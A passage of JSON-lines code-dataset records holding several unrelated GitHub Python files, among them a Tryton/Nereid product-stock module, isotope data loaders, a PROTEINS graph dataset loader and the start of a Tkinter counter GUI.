Usuário não editável.\\033[m')\n else:\n del lista_Usuarios[0:3]\n print(lista_Usuarios[numero-4])\n lista_Usuarios.pop(numero - 4)\n edicao =[]\n nome = input(\"Editar nome funcionário:\\n\")\n edicao.append(nome)\n senha = input(\"\\nEditar nova senha do funcionário:\\n\")\n edicao.append(senha)\n print(\"Selecione o cargo do funcionario:\")\n cargo = menu(\n [\"admin\", \"recepcionista\", \"mecanico\"])\n cargo = str(cargo)\n edicao.append(cargo)\n cPf = input(\"\\nEditar CPF do funcionário:\\n\")\n edicao.append(cPf)\n lista_Usuarios.insert(numero-4, edicao)\n with open('funcionarios.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_Usuarios:\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \"\\n\"\n arquivo.write(func)\n #aualizarLista(user1)\n\ndef editarClientes(numero,lista_Clientes):\n limite = len(lista_Clientes)\n if numero > limite or numero == 0:\n print(\"Não existe essa opção.\")\n else:\n print(lista_Clientes[numero-1])\n lista_Clientes.pop(numero - 1)\n\n edicao =[]\n nome = input(\"Digite nome cliente:\\n\")\n edicao.append(nome)\n cPf = input(\"\\nDigite CPF do cliente:\\n\")\n edicao.append(cPf)\n email = input(\"\\nDigite email do cliente:\\n\")\n edicao.append(email)\n telefone = input(\"\\nDigite o telefone do cliente:\\n\")\n edicao.append(telefone)\n endereco = input(\"\\nDigite o endereço do cliente:\\n\")\n edicao.append(endereco)\n placa = input(\"\\ndigite a placa do carro:\\n\")\n edicao.append(placa)\n print(\"\\nSelecione o cargo do funcionario:\\n\")\n\n lista_Clientes.insert(numero-1, edicao)\n with open('clientes.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_Clientes:\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \", \" + item[4] + \", \" + item[5] + \"\\n\"\n arquivo.write(func)\n #atualizarClientes()","repo_name":"Igorpereirag/Projetofinal_logica-de-programa-o","sub_path":"lib/interface/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7892,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73208668168","text":"from datetime import date\nfrom dateutil.relativedelta import relativedelta\n\nfrom trytond.transaction import Transaction\nfrom trytond.pool import PoolMeta, Pool\nfrom trytond.model import fields\nfrom trytond.pyson import Bool, Eval\nfrom nereid import request, cache, jsonify, abort, current_user, route\nfrom nereid.helpers import key_from_list\n\n__all__ = ['Product']\n__metaclass__ = PoolMeta\n\n\nclass Product:\n \"Product extension for Nereid\"\n __name__ = \"product.product\"\n\n display_available_quantity = fields.Boolean(\n \"Display Available Quantity On Website?\"\n )\n\n start_displaying_qty_digits = fields.Function(\n fields.Integer('Start Quantity Digits'),\n getter='on_change_with_start_displaying_qty_digits'\n )\n\n start_displaying_available_quantity = fields.Numeric(\n 'Start Quantity', digits=(16, Eval('start_displaying_qty_digits', 2)),\n states={\n 'invisible': ~Bool(Eval('display_available_quantity')),\n }, depends=[\n 'display_available_quantity', 'start_displaying_qty_digits',\n ],\n help=(\n \"Product's available quantity must be less than this to show on\"\n \" website\"\n )\n )\n\n min_warehouse_quantity = fields.Numeric(\n 'Min Warehouse Quantity', digits=(16, 4),\n help=\"Minimum quantity required in warehouse for orders\"\n )\n is_backorder = fields.Function(\n fields.Boolean(\"Is Backorder\"), getter=\"get_is_backorder\"\n )\n\n def 
get_is_backorder(self, name):\n if self.min_warehouse_quantity is None or \\\n self.min_warehouse_quantity < 0:\n return True\n return False\n\n @classmethod\n def __setup__(cls):\n super(Product, cls).__setup__()\n\n cls._error_messages.update({\n 'start_displaying_positive': (\n 'This quantity should be always be positive'\n ),\n })\n\n @classmethod\n def validate(cls, records):\n \"\"\"\n Validation method\n \"\"\"\n super(Product, cls).validate(records)\n\n for record in records:\n record.validate_start_display_quantity()\n\n def validate_start_display_quantity(self):\n \"\"\"\n This method validates that `start_displaying_available_quantity` is\n always positive.\n \"\"\"\n if self.start_displaying_available_quantity and \\\n self.start_displaying_available_quantity <= 0:\n self.raise_user_error('start_displaying_positive')\n\n @staticmethod\n def default_min_warehouse_quantity():\n \"\"\"\n By default, min_warehouse_quantity is minus one. This is to handle the\n normal sale order workflow.\n \"\"\"\n return -1\n\n @fields.depends('_parent_template')\n def on_change_with_start_displaying_qty_digits(self, name=None):\n \"\"\"\n Getter for start_displaying_qty_digits\n \"\"\"\n return self.template.default_uom.digits or 2\n\n def can_buy_from_eshop(self):\n \"\"\"\n This function is used for inventory checking purpose. It returns a\n boolean result on the basis of fields such as min_warehouse_quantity.\n \"\"\"\n quantity = self.get_availability().get('quantity')\n\n if self.type != 'goods':\n # If product type is not goods, then inventory need not be checked\n return True\n\n if self.min_warehouse_quantity < 0 or \\\n self.min_warehouse_quantity is None:\n # If min_warehouse_quantity is negative (back order) or not set,\n # product is in stock\n return True\n elif quantity > self.min_warehouse_quantity:\n # If min_warehouse_quantity is less than available quantity, product\n # is in stock\n return True\n else:\n # In all other cases, product is not in stock\n return False\n\n def inventory_status(self):\n \"\"\"\n This method returns the inventory status for the given product which can\n have the following messages -:\n * Out Of Stock\n * In Stock\n * X left\n\n It returns a tuple of the form -:\n ('in_stock', 'In Stock')\n whose elements are decided by the fields min_warehouse_quantity,\n start_displaying_available_quantity and the product's current quantity.\n\n The first element of the tuple can be used in future to decide things\n such as color scheming in template. 
The second element of the tuple is\n the message to show.\n \"\"\"\n if self.can_buy_from_eshop():\n status, message = 'in_stock', 'In stock'\n else:\n status, message = 'out_of_stock', 'Out of stock'\n\n quantity = self.get_availability().get('quantity')\n\n if status == 'in_stock' and self.display_available_quantity and \\\n quantity <= self.start_displaying_available_quantity:\n message = '%s %s left' % (quantity, self.default_uom.name)\n\n return status, message\n\n def serialize(self, purpose=None):\n \"\"\"\n Serialize product data\n \"\"\"\n if purpose == 'cart':\n return {\n 'id': self.id,\n 'code': self.code,\n 'name': self.name,\n 'category': self.category and self.category.name or None,\n 'image': (self.default_image.transform_command().thumbnail(\n 150, 150, 'a'\n ).url() if self.default_image else None),\n }\n if hasattr(super(Product, self), 'serialize'):\n return super(Product, self).serialize(purpose)\n\n def sale_price(self, quantity=0):\n \"\"\"Return the Sales Price.\n A wrapper designed to work as a context variable in templating\n\n The price is calculated from the pricelist associated with the current\n user. The user in the case of guest user is logged in user. In the\n event that the logged in user does not have a pricelist set against\n the user, the guest user's pricelist is chosen.\n\n Finally if neither the guest user, nor the regsitered user has a\n pricelist set against them then the list price is displayed as the\n list price of the product\n\n :param quantity: Quantity\n \"\"\"\n Sale = Pool().get('sale.sale')\n\n price_list = Sale.default_price_list()\n\n if current_user.is_anonymous():\n customer = request.nereid_website.guest_user.party\n else:\n customer = current_user.party\n\n # Build a Cache key to store in cache\n cache_key = key_from_list([\n Transaction().cursor.dbname,\n Transaction().user,\n customer.id,\n price_list, self.id, quantity,\n request.nereid_currency.id,\n 'product.product.sale_price',\n ])\n price = cache.get(cache_key)\n if price is None:\n # There is a valid pricelist, now get the price\n with Transaction().set_context(\n customer=customer.id,\n price_list=price_list,\n currency=request.nereid_currency.id\n ):\n price = self.get_sale_price([self], quantity)[self.id]\n\n # Now convert the price to the session currency\n cache.set(cache_key, price, 60 * 5)\n return price\n\n def get_availability(self):\n \"\"\"\n This method could be subclassed to implement your custom availability\n behavior.\n\n By default the forecasted quantity is a 7 day forecast. In future this\n feature may be replaced with a configuration value on the website to\n specify the number of days to forecast.\n\n .. 
warning::\n `quantity` is mandatory information which needs to be returned, no\n matter what your logic for computing that is\n\n :return: A dictionary with `quantity` and `forecast_quantity`\n \"\"\"\n context = {\n 'locations': [request.nereid_website.stock_location.id],\n 'stock_date_end': date.today() + relativedelta(days=7)\n }\n with Transaction().set_context(**context):\n return {\n 'quantity': self.get_quantity([self], 'quantity')[self.id],\n 'forecast_quantity': self.get_quantity(\n [self], 'forecast_quantity'\n )[self.id],\n }\n\n @classmethod\n @route('/product-availability/')\n def availability(cls, uri):\n \"\"\"\n Returns the following information for a product:\n\n +-------------------+-----------------------------------------------+\n | quantity | Available readily to buy |\n +-------------------+-----------------------------------------------+\n | forecast_quantity | Forecasted quantity, if the site needs it |\n +-------------------+-----------------------------------------------+\n\n .. note::\n To modify the availability, or to send any additional information,\n it is recommended to subclass the :py:meth:`~get_availability` and\n implement your custom logic. For example, you might want to check\n stock with your vendor for back orders or send a message like\n `Only 5 pieces left`\n\n :param uri: URI of the product for which the availability needs to\n be found\n :return: JSON object\n \"\"\"\n try:\n product, = cls.search([\n ('displayed_on_eshop', '=', True),\n ('uri', '=', uri),\n ])\n except ValueError:\n return abort(404)\n\n return jsonify(product.get_availability())\n","repo_name":"openlabs/nereid-cart-b2c","sub_path":"product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":9743,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"20314643473","text":"from os import listdir\nfrom os.path import isfile, join\nimport pickle\nimport os.path\nimport sys\nfrom enxParser import *\n\nif os.path.dirname(__file__) == \"/usr/share/isonav\":\n DATA_PATH = \"/usr/share/isonav/data1p4p5\"\n# elif os.path.dirname(__file__) == \".\":\nelse:\n # fileName=os.path.dirname(__file__)\n DATA_PATH =\"./data1p4p5\"\n print(\"#You do not have a working installation of isonav\")\n print(\"#See the installation procedure in the README file\")\n # sys.exit(1)\n\nisoDictLoc=os.path.join(DATA_PATH, \"isoDict.pkl\")\nisoMassesLoc=os.path.join(DATA_PATH, \"isoMasses.txt\")\nisoDictMassLoc=os.path.join(DATA_PATH, \"isoDictMass.pkl\")\nisoDatadb=os.path.join(DATA_PATH, \"isoData.db\")\nisonavQR=os.path.join(DATA_PATH, \"isonavQR.png\")\nwMLoc=os.path.join(DATA_PATH, \"webMasses.txt\")\nchemTxt=os.path.join(DATA_PATH,\"materialTable.txt\")\nchemPkl=os.path.join(DATA_PATH,\"matTab.pkl\")\n\n#Isotope dictionary\niDict={}\nlistStuff=['n','H','He','Li','Be','B','C','N','O','F','Ne',\n 'Na','Mg','Al','Si','P','S','Cl','Ar','K','Ca',\n 'Sc','Ti','V','Cr','Mn','Fe','Co','Ni','Cu','Zn',\n 'Ga','Ge','As','Se','Br','Kr','Rb','Sr','Y','Zr',\n 'Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn',\n 'Sb','Te','I','Xe','Cs','Ba','La','Ce','Pr','Nd',\n 'Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb',\n 'Lu','Hf','Ta','W','Re','Os',\n 'Ir','Pt','Au','Hg','Tl','Pb','Bi','Po','At','Rn',\n 'Fr','Ra','Ac','Th','Pa','U','Np','Pu','Am','Cm',\n 'Bk','Cf','Es','Fm','Md','No','Lr',\n 'Rf','Db','Sg','Bh','Hs','Mt','Ds','Rg',\n 'Cn','Ed','Fl','Ef','Lv','Eh','Ei']\n\nnameDict={'n':\"neutron\",'H':\"Hydrogen\",\"He\":\"Helium\",\"Li\":\"Lithium\",\n 
\"Be\":\"Berillium\",\"B\":\"Boron\",\"C\":\"Carbon\",\"N\":\"Nitrogen\",\n \"O\":\"Oxygen\",\"F\":\"Fluorine\",\"Ne\":\"Neon\",\"Na\":\"Sodium\",\n \"Mg\":\"Magnesium\",\"Al\":\"Aluminum\",\"Si\":\"Silicon\",\n \"P\":\"Phosphorus\",\"S\":\"Sulfur\",\"Cl\":\"Chlorine\",\"Ar\":\"Argon\",\n \"K\":\"Potassium\",\"Ca\":\"Calcium\",\"Sc\":\"Scandium\",\n \"Ti\":\"Titanium\",\"V\":\"Vanadium\",\"Cr\":\"Chromium\",\n \"Mn\":\"Manganese\",\"Fe\":\"Iron\",\"Co\":\"Cobalt\",\"Ni\":\"Nickel\",\n \"Cu\":\"Copper\",\"Zn\":\"Zinc\",\"Ga\":\"Gallium\",\"Ge\":\"Germanium\",\n \"As\":\"Arsenic\",\"Se\":\"Selenium\",\"Br\":\"Bromine\",\"Kr\":\"Krypton\",\n \"Rb\":\"Rubidium\",\"Sr\":\"Strontium\",\"Y\":\"Yttrium\",\"Zr\":\"Zirconium\",\n \"Nb\":\"Niobium\",\"Mo\":\"Molybdenum\",\"Tc\":\"Technetium\",\n \"Ru\":\"Ruthenium\",\"Rh\":\"Rhodium\",\"Pd\":\"Palladium\",\"Ag\":\"Silver\",\n \"Cd\":\"Cadmium\",\"In\":\"Indium\",\"Sn\":\"Tin\",\"Sb\":\"Antimony\",\n \"Te\":\"Tellurium\",\"I\":\"Iodine\",\"Xe\":\"Xenon\",\"Cs\":\"Cesium\",\n \"Ba\":\"Barium\",\"La\":\"Lanthanum\",\"Ce\":\"Cerium\",\"Pr\":\"Praseodymium\",\n \"Nd\":\"Neodymium\",\"Pm\":\"Promethium\",\"Sm\":\"Samarium\",\n \"Eu\":\"Europium\",\"Gd\":\"Gadolinium\",\"Tb\":\"Terbium\",\"Dy\":\"Dysprosium\",\n \"Ho\":\"Holmium\",\"Er\":\"Erbium\",\"Tm\":\"Thulium\",\"Yb\":\"Ytterbium\",\n \"Lu\":\"Lutetium\",\"Hf\":\"Hafnium\",\"Ta\":\"Tantalum\",\"W\":\"Tungsten\",\n \"Re\":\"Rhenium\",\"Os\":\"Osmium\",\"Ir\":\"Iridium\",\"Pt\":\"Platinum\",\n \"Au\":\"Gold\",\"Hg\":\"Mercury\",\"Tl\":\"Thallium\",\"Pb\":\"Lead\",\n \"Bi\":\"Bismuth\",\"Po\":\"Polonium\",\"At\":\"Astatine\",\"Rn\":\"Radon\",\n \"Fr\":\"Francium\",\"Ra\":\"Radium\",\"Ac\":\"Actinium\",\"Th\":\"Thorium\",\n \"Pa\":\"Protactinium\",\"U\":\"Uranium\",\"Np\":\"Neptunium\",\"Pu\":\"Plutonium\",\n \"Am\":\"Americium\",\"Cm\":\"Curium\",\"Bk\":\"Berkellium\",\n \"Cf\":\"Californium\",\"Es\":\"Einsteinium\",\"Fm\":\"Fermium\",\"Md\":\"Mendelevium\",\n \"No\":\"Nobelium\",\"Lr\":\"Lawrencium\",\"Rf\":\"Rutherfordium\",\n \"Db\":\"Dubnium\",\"Sg\":\"Seaborgium\",\"Bh\":\"Bohrium\",\"Hs\":\"Hassium\",\n \"Mt\":\"Meitnerium\",\"Ds\":\"Darmstadtium\",\"Rg\":\"Roentgenium\",\n \"Cn\":\"Copernicium\",\"Ed\":\"Ununtrium\",\"Fl\":\"Flerovium\",\"Ef\":\"Ununpentium\",\n \"Lv\":\"Livermorium\",\"Eh\":\"Ununseptium\",\"Ei\":\"Ununoctium\"}\n\n# if not os.path.isfile(isoDictLoc):\n# lines = [line.strip().split() for line in open(isoMassesLoc)]\n\ndef populateDict1():\n lines = [line.strip().split() for line in open(isoMassesLoc)]\n listLen=len(listStuff)\n #iDict[e][0]==proton number\n iDict['None']=[0,{0:[0]}]\n for i in range(listLen):\n iDict[listStuff[i]]=[i,{}]\n for j in lines:\n if i == int(j[0]):\n iDict[listStuff[i]][1][int(j[1])]=[float(j[2])]\n return iDict\n\ndef populateDict2(iDict):\n listLen=len(listStuff)\n #iDict[e][0]==proton number\n enxList=putIsoData()\n lines = [line.strip().split() for line in open(isoMassesLoc)]\n for i in range(listLen):\n for j in lines:\n if i == int(j[0]):\n fName=getFileName(enxList,listStuff[i],int(j[1]))\n if not fName:\n # iDict[listStuff[i]][1][int(j[1])].append([])\n continue\n fName=\"excitedData/\"+fName\n pDPart=enxParse(fName)\n iDict[listStuff[i]][1][int(j[1])].append(pDPart)\n # if j <=3:\n # print iDict[listStuff[i]][1][int(j[1])]\n return iDict\n\ndef getFileName(aList,key,iso):\n for e in aList:\n if e[0]==key and e[1]==iso:\n return e[2]\n return False\n\ndef populateDict():\n if os.path.isfile(isoDictLoc):\n # print \"#Dictionary file exists, 
loading it\"\n iDict = pickle.load(open(isoDictLoc, \"rb\" ))\n else:\n print(\"#Dictionary file does not exist, creating it\")\n iDict=populateDict1()\n iDict=populateDict2(iDict)\n pickle.dump(iDict,open(isoDictLoc,\"wb\"),2)\n return iDict\n\ndef fastPopulateDict():\n if os.path.isfile(isoDictMassLoc):\n # print \"#Dictionary file exists, loading it\"\n iDict = pickle.load(open(isoDictMassLoc, \"rb\" ))\n else:\n print(\"#Dictionary file does not exist, creating it\")\n iDict=populateDict1()\n pickle.dump(iDict,open(isoDictMassLoc,\"wb\"),2)\n return iDict\n\ndef putIsoData():\n isoVal=getIsoVal()\n filterList=[]\n for e in isoVal:\n #Ignoring weird enx files\n if '_' not in e[0] and not e[0].isdigit():\n boolVal=e[1] in iDict[e[0]][1]\n if boolVal:\n # print e, boolVal\n filterList+=[e]\n return filterList\n\ndef index(string,char):\n \"\"\"Finds the index of the first char that is found\"\"\"\n for i in range(len(string)):\n if string[i]==char:\n return i\n return -1\n\ndef getIsoVal():\n return [[f[3:index(f,'.')],int(f[0:3]),f] for f in listdir('excitedData')\\\n if isfile(join('excitedData',f))]\n\ndef generateIsoMfromWebM():\n FILE = open(isoMassesLoc,\"w\")\n lines = [line.strip().split() for line in open(wMLoc)]\n for line in lines:\n #Omitting empty lines and beginning with #\n if len(line)>0 and line[0][0] != '#':\n massP2=line[-2]\n # if '#' in massP2:\n # continue #Omitting this values\n newMassP2 = massP2.replace(\".\", \"\")\n newerMassP2 = newMassP2.replace(\"#\", \"\")\n massP1= line[-3]\n mass=float(massP1+\".\"+newerMassP2)\n if line[4].isdigit():\n symbol=line[5]\n aVal=int(line[4])\n pVal=int(line[3])\n else:\n symbol=line[4]\n aVal=int(line[3])\n pVal=int(line[2])\n myString=str(pVal)+\"\\t\\t\"+str(aVal)+\"\\t\"+str(mass)+\"\\n\"\n print(myString)\n FILE.write(myString)\n FILE.close()\n# print isoVal\n# print len(isoVal)\n\ndef getChemDict(chemTxtFile):\n \"\"\"Loads a txt file with the properties for the energy loss\n calculations\"\"\"\n with open(chemTxtFile) as chemFile:\n theLines=chemFile.readlines()\n\n chemDict={}\n for line in theLines:\n if line[0] == '#':\n continue\n myList=line.split()\n if len(myList) > 0:\n symbol=myList[0]\n Z=int(myList[1])\n A_r=myList[2]\n if A_r[0] == '(':\n A_r=A_r[1:-1]\n A_r=float(A_r)\n density=myList[5]\n I=myList[-1]\n if density != '-':\n density=float(density)\n if I != '-':\n I=float(I)\n chemDict[symbol]=[Z,A_r,density,I]\n return chemDict\n\n#If the material database has to be modified then edit the txt file and\n#then run this command inside the repo's folder: saveChemDat()\n####################DON'T FORGET TO REINSTALL!!!!!#############\ndef saveChemDat():\n print(\"Creating the pickle file for chemDat\")\n chemDict=getChemDict(chemTxt)\n #Specifying protocol 2 since 3 is backwards incompatible\n pickle.dump(chemDict,open(chemPkl,\"wb\"),2)\n\ndef getChemDictFromFile():\n chemDict=pickle.load(open(chemPkl,\"rb\"))\n return chemDict\n\n\n# The nist file for abundances and masses etc. 
is located at:\n# https://physics.nist.gov/cgi-bin/Compositions/stand_alone.pl?ele=&all=all&ascii=ascii2\n# And the URL that generated it is:\n#https://www.nist.gov/pml/atomic-weights-and-isotopic-compositions-relative-atomic-masses\n#Where the all elements, linearized output and all isotopes options were marked.\ndef parseNistFile(nistFile):\n #return NISTDict\n pass\n\ndef pickleNistDict(nistDict):\n #Do a saving ...\n pass\n\ndef getNistDict():\n #Do unpickling here, probably will replace other parts (like the masses)\n pass\n","repo_name":"ffavela/isonav","sub_path":"loadingStuff.py","file_name":"loadingStuff.py","file_ext":"py","file_size_in_byte":9361,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"33099029779","text":"import os, sys\nimport platform\n\nnode_num = int(platform.node().split(\"emerald\")[-1]) - 1\n\ndef search_dir(aDirname):\n filelist = []\n filenames = os.listdir(aDirname)\n for filename in filenames:\n full_filename = os.path.join(aDirname, filename)\n ext = os.path.splitext(full_filename)[-1]\n filelist.append(full_filename)\n\n return filelist\n\ndef search(aDirname, aType):\n filelist = []\n filenames = os.listdir(aDirname)\n for filename in filenames:\n full_filename = os.path.join(aDirname, filename)\n ext = os.path.splitext(full_filename)[-1]\n if ext == aType:\n filelist.append(full_filename)\n\n return filelist\n\n\n\nroot_path = \"/scratch/jmmoon/SubregionBlock/\"\n\ndirlist = search_dir(root_path)\ndirlist.sort()\n\nfor p in dirlist:\n\tname = p.split(root_path)[-1]\n\tsave_path = root_path + name +\"/\"\n\t#print (\"./build/app \" + str(node_num) + \" \" + save_path)\n\tos.system(\"./build/app \" + str(node_num) + \" \" + save_path)\n\n\n\n","repo_name":"MoonJungmin/ZebrafishAnalytics_Dataprocessing","sub_path":"VA_DataGenerate/EM_yzzxmultilevel/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2412125885","text":"import torch\nimport numpy as np\nfrom ast import literal_eval\n\nimport networkx as nx\nfrom sklearn.model_selection import StratifiedKFold\nclass Graph0:\n def __init__(self, graph, nodes):\n self.graph = graph.to('cuda') # Ajacency Matrix\n self.nodes = nodes.to('cuda') # means C, N, ... 
Br\n self.label = label.to('cuda')\n\nclass Graph:\n def __init__(self, nx_graph):\n self.nx_graph = nx_graph\n self.neighbors = []\n self.max_degree = None\n self.node_labels = []\n self.node_features = []\n self.node_attributes = []\n self.edges = []\n self.label = None\n\ndef separate_data(graph_list, seed, fold_idx):\n assert 0 <= fold_idx and fold_idx < 10, \"fold_idx must be from 0 to 9.\"\n skf = StratifiedKFold(n_splits=10, shuffle = True, random_state = seed)\n\n labels = [graph.label for graph in graph_list]\n idx_list = []\n for idx in skf.split(np.zeros(len(labels)), labels):\n idx_list.append(idx)\n train_idx, test_idx = idx_list[fold_idx]\n\n train_graph_list = [graph_list[i] for i in train_idx]\n test_graph_list = [graph_list[i] for i in test_idx]\n\n return train_graph_list, test_graph_list\n\ndef load_data_table():\n graph_idx_file = '../dataset/PROTEINS/PROTEINS_graph_indicator.txt'\n adjacency_file = '../dataset/PROTEINS/PROTEINS_A.txt'\n node_label_file = '../dataset/PROTEINS/PROTEINS_node_labels.txt'\n node_attribute_file = '../dataset/PROTEINS/PROTEINS_node_attributes.txt'\n graph_label_file = '../dataset/PROTEINS/PROTEINS_graph_labels.txt'\n\n graph_list = []\n\n \n graph_size_list = []\n \n cur_g_idx = 0\n cur_size = 0\n graph_list.append(Graph(nx.Graph()))\n with open(graph_idx_file) as fp:\n for line in fp.readlines():\n if int(line) - 1 == cur_g_idx:\n cur_size += 1\n graph_list[cur_g_idx].nx_graph.add_node(cur_size)\n else:\n graph_list.append(Graph(nx.Graph()))\n graph_size_list.append(cur_size)\n cur_g_idx = int(line) - 1\n cur_size = 1\n graph_list[cur_g_idx].nx_graph.add_node(cur_size)\n graph_size_list.append(cur_size)\n\n assert len(list(graph_list[-1].nx_graph.nodes)) == cur_size\n\n\n graph_idx = 0\n pre_sum = 0\n size_sum = graph_size_list[graph_idx] \n with open(adjacency_file) as fp:\n for line in fp.readlines():\n edge = literal_eval(line)\n if edge[0] > size_sum or edge[1] > size_sum:\n graph_idx += 1\n pre_sum = size_sum\n size_sum += graph_size_list[graph_idx]\n graph_list[graph_idx].nx_graph.add_edge(edge[0] - pre_sum, edge[1] - pre_sum)\n\n \n assert len(list(graph_list[0].nx_graph.edges)) == 81\n assert len(list(graph_list[1].nx_graph.nodes)) == graph_size_list[1]\n\n graph_idx = 0\n size = 0\n node_idx = 0\n graph = None\n node_label_map = {}\n with open(node_label_file) as fp1:\n with open(node_attribute_file) as fp2:\n for node_label, node_attribute in zip(fp1.readlines(), fp2.readlines()):\n if not node_label in node_label_map:\n mapped_label = len(node_label_map)\n node_label_map[node_label] = mapped_label\n # 当前graph的node已填满 或者node_idx == size == 0,需初始化size和nodes\n if node_idx == size:\n graph = graph_list[graph_idx]\n size = graph_size_list[graph_idx]\n node_idx = 0\n graph_idx += 1\n graph.node_labels.append(node_label_map[node_label])\n graph.node_attributes.append(float(node_attribute))\n node_idx += 1\n assert len(graph_list[-1].node_labels) == graph_size_list[-1]\n\n for i, graph in enumerate(graph_list):\n neighbors = [[] for i in range(len(graph.nx_graph))]\n edges = [[edge[0]-1, edge[1]-1] for edge in graph.nx_graph.edges]\n for i, j in edges:\n neighbors[i].append(j)\n neighbors[j].append(i)\n graph.neighbors = neighbors\n\n degree_list = []\n for i in range(len(graph.nx_graph)):\n degree_list.append(len(neighbors[i]))\n graph.max_degree = max(degree_list)\n\n edges.extend([[j, i] for i, j in edges])\n graph.edges = torch.LongTensor(edges).transpose(0,1)\n\n graph.node_features = torch.zeros(len(graph.node_labels), 
len(node_label_map))\n graph.node_features[range(len(graph.node_labels)), [node_label for node_label in graph.node_labels]] = 1\n\n\n label_map = {}\n \n with open(graph_label_file) as fp:\n for graph_idx, graph_label in enumerate(fp.readlines()):\n if not graph_label in label_map:\n mapped_label = len(label_map)\n label_map[graph_label] = mapped_label\n \n graph_list[graph_idx].label = label_map[graph_label]\n\n return graph_list, len(label_map)\n\n\ndef load_data():\n graph_idx_file = '../dataset/PROTEINS/PROTEINS_graph_indicator.txt'\n adjacency_file = '../dataset/PROTEINS/PROTEINS_A.txt'\n node_label_file = '../dataset/PROTEINS/PROTEINS_node_labels.txt'\n node_attribute_file = '../dataset/PROTEINS/PROTEINS_node_attributes.txt'\n graph_label_file = '../dataset/PROTEINS/PROTEINS_graph_labels.txt'\n\n adjacency_list = []\n graph_size_list = []\n\n cur_g_idx = 1\n cur_size = 0\n\n with open(graph_idx_file) as fp:\n for line in fp.readlines():\n if int(line) == cur_g_idx:\n cur_size += 1\n else:\n adjacency_list.append(torch.zeros(cur_size, cur_size))\n graph_size_list.append(cur_size)\n cur_size = 1\n cur_g_idx = int(line)\n adjacency_list.append(torch.zeros(cur_size, cur_size))\n graph_size_list.append(cur_size)\n\n # print(graph_size_list[:3]) # [42, 27, 10]\n size_sum = 0\n\n graph_idx = 0\n pre_sum = 0\n size_sum += graph_size_list[graph_idx] \n with open(adjacency_file) as fp:\n for line in fp.readlines():\n edge = literal_eval(line)\n if edge[0] > size_sum or edge[1] > size_sum:\n graph_idx += 1\n pre_sum = size_sum\n size_sum += graph_size_list[graph_idx]\n adjacency_list[graph_idx][edge[0] - 1 - pre_sum, edge[1] - 1 - pre_sum] = 1.0\n\n # print(graph_list[0].sum()) # tensor(162.)\n\n dim = 4\n graph_idx = 0\n size = 0\n node_idx = 0\n node_list = []\n with open(node_label_file) as fp1:\n with open(node_attribute_file) as fp2:\n for node_label, node_attribute in zip(fp1.readlines(), fp2.readlines()):\n # 当前graph的node已填满 或者node_idx == size == 0,需初始化size和nodes\n if node_idx == size:\n size = graph_size_list[graph_idx]\n nodes = torch.zeros(size, dim)\n node_idx = 0\n graph_idx += 1\n \n node_label = int(node_label)\n node_attribute = float(node_attribute)\n node_val = 1.0\n if node_label == 0:\n nodes[node_idx] = torch.tensor([node_val, 0.0, 0.0, node_attribute])\n elif node_label == 1:\n nodes[node_idx] = torch.tensor([0.0, node_val, 0.0, node_attribute])\n else:\n nodes[node_idx] = torch.tensor([0.0, 0.0, node_val, node_attribute])\n\n node_idx += 1\n\n if node_idx == size:\n node_list.append(nodes)\n\n # print(node_list[0].shape) # torch.Size([42, 4])\n\n graph_list = []\n label_list = []\n \n with open(graph_label_file) as fp:\n for graph_idx, graph_label in enumerate(fp.readlines()):\n \n graph_label = torch.tensor([float(graph_label) - 1.0])\n label_list.append(graph_label)\n # if graph_label == '1':\n # label_list.append(torch.tensor([1.0, 0.0]).to('cuda'))\n # else:\n # label_list.append(torch.tensor([0.0, 1.0]).to('cuda'))\n\n graph_list.append(Graph0(adjacency_list[graph_idx], node_list[graph_idx], graph_label))\n \n return graph_list, label_list\n \n# import os \nif __name__ == \"__main__\":\n # test loading graph_idx_file\n\n _, classes = load_data_table()\n \n\n\n # os.chdir('DeepGraphFramework/GraphIsomorphismNetwork/src')\n # molecule_list, label_list = load_data() # data includes Ajacency and node_info \n\n # molecule0 = molecule_list[0] \n\n # print(molecule0.nodes)\n # print(molecule0.graph[0, :])\n # print(torch.mm(molecule0.graph, molecule0.nodes))\n \n\n 
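# Added commentary, not part of the original script: a minimal, hedged usage sketch.\n    # load_data_table() above returns (graph_list, num_classes); one fold of the stratified\n    # 10-fold split could then be taken roughly like this (seed/fold_idx values are illustrative):\n    # graph_list, num_classes = load_data_table()\n    # train_graphs, test_graphs = separate_data(graph_list, seed=0, fold_idx=0)\n    # print(len(train_graphs), len(test_graphs), num_classes)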
\n\n\n\n\n\n\n \n\n","repo_name":"cleverer123/GraphIsomorphism_Torch","sub_path":"src/load_proteins.py","file_name":"load_proteins.py","file_ext":"py","file_size_in_byte":8860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41007777631","text":"'''\nRose Williams\nrosew@binghamton.edu\nGUI and MVC example\n'''\n\n'''\nVirtual counter GUI\nAllows user to count up or down using buttons, reset counter using button,\n and set counter by entering value and pressing on keyboard\nOutput:\n value of counter displayed in Label (int)\nInput:\n value of counter entered into Entry box (int)\nTasks:\n Create GUI with\n Model -\n counter (Counter)\n Controllers -\n buttonUp, buttonDown, buttonReset (Button)\n entry (Entry)\n View -\n value (Label)\n countUp()\n countDown()\n reset()\n set()\n'''\n\nfrom tkinter import * #All classes in GUI module\nfrom Counter import Counter #Model class\n\n# Provides GUI representation (View and Controller) of counter (Model)\nclass CounterGUI:\n # --------------------------------------------------------------------------\n # Constructor\n\n # Creates instance of Model class (Counter), creates, configures, and\n # places all Controller and View widgets, and starts listener\n def __init__(self):\n # Create main window\n self.__win = Tk()\n\n # Create Controller frames\n self.__top = Frame(self.__win)\n self.__mid = Frame(self.__win)\n 